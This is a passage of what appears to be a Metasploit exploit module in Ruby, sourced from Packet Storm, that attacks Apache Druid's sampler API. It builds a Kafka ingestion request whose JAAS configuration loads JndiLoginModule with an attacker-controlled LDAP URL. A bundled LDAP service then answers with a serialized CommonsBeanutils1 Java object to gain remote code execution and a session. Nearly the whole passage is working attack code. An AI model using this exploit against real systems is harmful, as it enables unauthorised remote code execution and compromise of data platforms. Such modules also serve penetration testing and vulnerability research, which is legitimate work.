Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received    report_vuln({      host: rhost,      port: rport,      name: name.to_s,      refs: references,      info: "Module #{fullname} found vulnerable host."    })    Exploit::CheckCode::Vulnerable  ensure    cleanup_service  end  def build_ldap_search_response_payload    return [] if @search_received    @search_received = true    return [] unless @exploiting    print_good('Delivering the serialized Java object to execute the payload...')    build_ldap_search_response_payload_inline('CommonsBeanutils1')  end  def trigger    data = {      type: 'kafka',      spec: {        type: 'kafka',        ioConfig: {          type: 'kafka',          consumerProperties: {            "bootstrap.servers": "#{Faker::Internet.ip_v4_address}:#{Faker::Number.number(digits: 4)}",            "sasl.mechanism": 'SCRAM-SHA-256',            "security.protocol": 'SASL_SSL',            "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"#{Rex::Text.rand_text_alphanumeric(5)}\" debug=\"true\" group.provider.url=\"#{Rex::Text.rand_text_alphanumeric(5)}\";"          },          topic: Rex::Text.rand_text_alpha(8..12).to_s,          useEarliestOffset: true,          inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: (SecureRandom.uuid.gsub('-', '')[0..20]).to_s, columns: ['raw'] }        },        dataSchema: { dataSource: Rex::Text.rand_text_alphanumeric(5..10).to_s, timestampSpec: { column: Rex::Text.rand_text_alphanumeric(5..10).to_s, missingValue: DateTime.now.utc.iso8601.to_s }, dimensionsSpec: {}, granularitySpec: { rollup: false } },        tuningConfig: { type: 'kafka' }      },      samplerConfig: { numRows: 500, timeoutMs: 15000 }    }    @search_received = false    send_request_cgi(      'uri' => normalize_uri(target_uri, '/druid/indexer/v1/sampler') + '?for=connect',      'method' => 'POST',      'ctype' => 'application/json',      'data' => data.to_json    )  end  def exploit    validate_configuration!    @exploiting = true    start_service    res = trigger    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400    retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received && (!handler_enabled? || session_created?) }    handler  ensure    cleanup  endend

Source

Packet Storm